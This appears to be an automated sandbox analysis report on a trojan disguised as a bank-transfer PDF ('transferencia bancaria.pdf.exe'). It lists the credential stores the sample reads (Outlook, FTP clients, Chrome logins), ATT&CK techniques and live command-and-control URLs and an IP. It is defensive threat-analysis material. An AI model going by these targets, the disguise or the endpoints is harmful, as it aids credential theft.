                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationPath Interception111
                  Process Injection
                  11
                  Masquerading
                  2
                  OS Credential Dumping
                  11
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools
                  1
                  Credentials in Registry
                  21
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  Exfiltration Over Bluetooth2
                  Non-Application Layer Protocol
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Remote System Discovery
                  SMB/Windows Admin Shares2
                  Data from Local System
                  Automated Exfiltration112
                  Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                  Process Injection
                  NTDS13
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                  Obfuscated Files or Information
                  LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common13
                  Software Packing
                  Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Timestomp
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  transferencia bancaria.pdf.exe12%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  transferencia bancaria.pdf.exe21%VirustotalBrowse
                  transferencia bancaria.pdf.exe100%Joe Sandbox ML
                  No Antivirus matches
                  SourceDetectionScannerLabelLinkDownload
                  1.0.transferencia bancaria.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  0.2.transferencia bancaria.pdf.exe.442b890.12.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  SourceDetectionScannerLabelLink
                  sempersim.su21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://alphastand.top/alien/fre.php0%URL Reputationsafe
                  http://alphastand.top/alien/fre.php0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://alphastand.win/alien/fre.php0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://sempersim.su/gl21/fre.php0%Avira URL Cloudsafe
                  http://sempersim.su/gl21/fre.php19%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  sempersim.su
                  91.142.77.45
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://sempersim.su/gl21/fre.phptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bThetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.ibsensoftware.com/transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.tiro.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designerstransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.goodfont.co.krtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comltransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cThetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cntransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmltransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
